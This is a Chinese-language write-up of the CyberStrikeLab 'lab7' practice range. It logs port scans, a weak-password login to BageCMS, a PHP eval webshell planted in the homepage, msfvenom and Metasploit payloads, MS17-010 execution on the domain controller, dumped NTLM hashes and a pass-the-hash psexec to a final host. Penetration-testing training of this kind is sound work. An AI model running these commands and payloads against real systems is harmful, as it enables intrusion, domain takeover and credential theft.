cyberstrikelab-lab7

web渗透

9652端口八哥CMS

PS C:\Users\xt350> fscan.exe -h 192.168.10.10 -p 1-65000

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
192.168.10.10:139 open
192.168.10.10:135 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.10:5040 open
192.168.10.10:7680 open
192.168.10.10:9652 open
192.168.10.10:49664 open
192.168.10.10:49666 open
192.168.10.10:49665 open
192.168.10.10:49669 open
192.168.10.10:49668 open
192.168.10.10:49667 open
192.168.10.10:49670 open
[*] alive ports len is: 14
start vulscan
[*] WebTitle http://192.168.10.10:9652 code:200 len:14625  title:网站标题-网站标题 - Powered By BageCMS
已完成 14/14
[*] 扫描结束,耗时: 4m16.0065058s

http://192.168.10.10:9652/install.txt

这个地址泄露了后台管理地址，使用admin / admin123456弱口令登录后台，发现cms版本为 BageCMS3.1.0

修改网站首页源码

<?php @eval($_POST['a']);?>

生成msf马，执行，监听上线

msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z"

内网渗透

C:\phpstudy_pro\WWW>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter ��̫��ʵ�� 0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::8c17:fbcc:901f:c897%6
   IPv4 Address. . . . . . . . . . . : 192.168.10.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.233

Ethernet adapter ��̫��ʵ�� 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::fd48:8021:9701:9c1d%14
   IPv4 Address. . . . . . . . . . . : 192.168.20.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1

C:\phpstudy_pro\WWW>fscan.exe -h 192.168.20.10/24
fscan.exe -h 192.168.20.10/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.1
start infoscan
(icmp) Target 192.168.20.10   is alive
(icmp) Target 192.168.20.20   is alive
(icmp) Target 192.168.20.40   is alive
[*] Icmp alive hosts len is: 3
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.10:7680 open
192.168.20.40:88 open
192.168.20.20:3306 open
192.168.20.10:3306 open
192.168.20.40:445 open
192.168.20.40:139 open
192.168.20.20:139 open
192.168.20.10:139 open
192.168.20.40:135 open
192.168.20.20:135 open
192.168.20.10:135 open
[*] alive ports len is: 13
start vulscan
[+] NetInfo:
[*]192.168.20.40
   [->]WIN-137FCI4D99A
   [->]192.168.20.40
[+] NetInfo:
[*]192.168.20.20
   [->]cyberweb
   [->]192.168.20.20
[+] 192.168.20.40       MS17-010        (Windows Server 2016 Standard 14393)
[*] 192.168.20.40  [+]DC CYBERSTRIKELAB\WIN-137FCI4D99A   Windows Server 2016 Standard 14393
[*] 192.168.20.20        CYBERSTRIKELAB\CYBERWEB          Windows Server 2012 R2 Standard 9600
已完成 13/13
[*] 扫描结束,耗时: 14.733617s

域控主机为20.40，存在永恒之蓝漏洞，使用msf命令执行，获取第二个flag

use admin/smb/ms17_010_command
set command type c:\\flag.txt
set rhosts 192.168.20.40
run

配置路由

run post/multi/manage/autoroute

使用代理

use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run -j

本机使用proxifier代理到kali msf的ip地址和端口

开启本地资源共享

远程连接

传入msf正向马

msf设置好配置，准备上线

利用永恒之蓝执行木马（我们远程登录的是普通用户，不是系统权限，抓取不了hash），需要利用永恒之蓝来执行木马

msf auxiliary(admin/smb/ms17_010_command) > set command C:\\Users\\xiaoyu\\Desktop\\shell.exe
command => C:\Users\xiaoyu\Desktop\shell.exe
msf auxiliary(admin/smb/ms17_010_command) > run
[*] 192.168.20.40:445     - Target OS: Windows Server 2016 Standard 14393
[*] 192.168.20.40:445     - Built a write-what-where primitive...
[+] 192.168.20.40:445     - Overwrite complete... SYSTEM session obtained!
[+] 192.168.20.40:445     - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.20.40:445     - Getting the command output...
[*] 192.168.20.40:445     - Command finished with no output
[*] 192.168.20.40:445     - Executing cleanup...
[+] 192.168.20.40:445     - Cleanup was successful
[+] 192.168.20.40:445     - Command completed successfully!
[*] 192.168.20.40:445     - Output for "C:\Users\xiaoyu\Desktop\shell.exe":



[*] 192.168.20.40:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

因为使用的是正向连接，执行之后再来连接shell

msf auxiliary(admin/smb/ms17_010_command) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/bind_tcp
msf exploit(multi/handler) > show options

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.20.40    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf exploit(multi/handler) > run -j
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.

[*] Started bind TCP handler against 192.168.20.40:4444
msf exploit(multi/handler) > [*] Sending stage (177734 bytes) to 192.168.20.40
[*] Meterpreter session 4 opened (192.168.20.10:50929 -> 192.168.20.40:4444 via session 3) at 2025-12-11 02:21:05 -0500

msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                        Connection
  --  ----  ----                     -----------                        ----------
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-JFB  10.10.10.173:36245 -> 192.168.10.1
                                     57A8                               0:4444 (192.168.10.10)
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-137FCI4  192.168.20.10:50929 -> 192.168.20.
                                     D99A                               40:4444 via session 3 (192.168.20.
                                                                        40)

msf exploit(multi/handler) > sessions 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

利用msf的hashdump，获取域控主机的管理员hash

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8174fc8c5ee7a8e460df2e61d00bd3c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f230bc7afd28cc6d52aab59e6e31fd6a:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cyberweb:1106:aad3b435b51404eeaad3b435b51404ee:214352b7762ea8894f78edcbf5748a05:::
xiaoyu:1107:aad3b435b51404eeaad3b435b51404ee:73f5d97549f033374fa6d9f9ce247ffd:::
WIN-137FCI4D99A$:1000:aad3b435b51404eeaad3b435b51404ee:44ec20bd68d4e22d3428a97d15f441dd:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:664117f18ce890f00499a80e2fb92904:::

PTH 20，拿下最后一台机器

proxychains impacket-psexec -hashes :d8174fc8c5ee7a8e460df2e61d00bd3c cyberstrikelab.com/Administrator@192.168.20.20

本站小部分内容转载于互联网，如有侵权还请联系

THE END

OSCP打靶泷羽收录
# Windows渗透 # 域渗透 # CyberStrikeLab靶场 # 内网渗透 # Web渗透 # BageCMS渗透 # 八哥CMS漏洞 # 弱口令攻击

【域渗透】cyberstrikelab-lab7

cyberstrikelab-lab7

web渗透

内网渗透